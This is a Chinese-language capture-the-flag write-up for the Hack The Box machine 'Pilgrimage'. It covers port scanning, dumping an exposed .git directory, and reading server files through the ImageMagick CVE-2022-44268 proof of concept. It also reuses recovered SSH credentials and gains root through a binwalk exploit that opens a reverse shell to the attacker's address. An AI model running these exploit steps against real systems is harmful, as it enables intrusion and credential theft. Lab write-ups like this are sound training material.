HTB-Pilgrimage

admin
admin
admin
103611
文章
87
评论
2024年2月16日11:24:57评论10 views字数 1990阅读6分38秒阅读模式

端口扫描

扫描所有端口并且使用nmap的默认脚本对开放的端口进行漏洞测试

 nmap -sT -sV -sC -p- 10.10.11.219 -T4 -v -oA port-scan

HTB-Pilgrimage

直接访问web页面时发现会自动跳转到这个url ,https://pilgrimage.htb/ 我们这里需要绑定一个hosts

HTB-Pilgrimage

绑定hosts,可以看到这是一个上传文件的页面,接下来我们进行目录扫描

 echo "10.10.11.219  pilgrimage.htb" >> /etc/hosts

HTB-Pilgrimage

目录扫描

这里扫出很多目录,发现存在 /.git 泄露,我们直接使用.git泄露利用工具把泄露的目录或文件都爬下来

 dirsearch -u http://pilgrimage.htb/

HTB-Pilgrimage

项目地址:https://github.com/denny0223/scrabble

执行脚本下载所有泄露的目录及文件

 ./scrabble http://pilgrimage.htb/

HTB-Pilgrimage

下载完之后就有这些文件

HTB-Pilgrimage

Getshell

这看到在  index.php 文件中使用了magick工具对上传后的文件进行了处理

HTB-Pilgrimage

我们把下载的 magick 工具进行运行后发现版本,ImageMagick 7.1.0-49

 chmod +x magick
 ./magick --version

HTB-Pilgrimage

查找公开的poc或exp发现存在两个一个DOS攻击另一个是任意文件读取的,我们试试任意文件读取

HTB-Pilgrimage

复制到当前目录下

 searchsploit -m 51261 ./

HTB-Pilgrimage

CVE-2022-44268

打开后直接我们poc地址,接下来直接下载利用即可

项目地址:https://github.com/voidz0r/CVE-2022-44268

HTB-Pilgrimage

这里直接执行需要读取的系统文件就可以了,执行后会生成一个 image.png 的文件

 cargo run "/etc/passwd"

HTB-Pilgrimage

HTB-Pilgrimage

上传至网页中

HTB-Pilgrimage

HTB-Pilgrimage

上传成功后用wget再把这个图片下载下来

 wget http://pilgrimage.htb/shrunk/653d1de190f03.png

HTB-Pilgrimage

使用identify 工具查看图片详细信息

 identify -verbose 653d1de190f03.png

HTB-Pilgrimage

把这一串HEX编码后的字符进行解码后就可以看到读取文件的结果了

HTB-Pilgrimage

接下来我们继续读取源码中的这个文件

HTB-Pilgrimage

HTB-Pilgrimage

读取后发现了存在数据库执行的sql语句

HTB-Pilgrimage

HTB-Pilgrimage

这里发现了用户名及密码,第一次以为这是个密码,没想到用户名在下面.....

用户名:emily

密码:abigchonkyboi123

HTB-Pilgrimage

HTB-Pilgrimage

权限提升

登录ssh

HTB-Pilgrimage

查看进程查看sh脚本文件,这里有一个文件引起我们的注意,/usr/sbin/malwarescan.sh

 ps aux | grep sh

HTB-Pilgrimage

查看该脚本文件中代码

 #!/bin/bash
 
 blacklist=("Executable script" "Microsoft executable") #黑名单列表
 
 /usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do 
 #使用inotifywait工具进行监控目录/var/www/pilgrimage.htb/shrunk/一旦发现有创建文件的行为就把文件名(绝对路径)给FILE
         filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')" # 将绝对路径处理好给filename
         binout="$(/usr/local/bin/binwalk -e "$filename")" # 使用binwalk工具查看文件扩展
         for banned in "${blacklist[@]}"; do
                 if [[ "$binout" == *"$banned"* ]]; then # 如果文件扩展在黑名单列表中就执行rm删除文件
                    /usr/bin/rm "$filename" 
                    break
                 fi
         done
 done
 

HTB-Pilgrimage

查看可以看到 binwalk 工具的版本号,我们接下来查找Nay

HTB-Pilgrimage

还真有,就这一个而且是RCE

 searchsploit binwalk 2.3.2

HTB-Pilgrimage

这里随便给一个图片就可以了,ip和端口就是我们反弹nc的地址

 python 51249.py image.png 10.10.16.19 1399

HTB-Pilgrimage

执行成功后,会在当前目录生成一个图片

HTB-Pilgrimage

nc监听端口1399

 nc -lvnp 1399

使用wget下载到服务器目录/var/www/pilgrimage.htb/shrunk/,拿到root权限

HTB-Pilgrimage

原文始发于微信公众号(web安全初心实验室):HTB-Pilgrimage

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月16日11:24:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Pilgrimagehttps://cn-sec.com/archives/2383109.html

发表评论

匿名网友 填写信息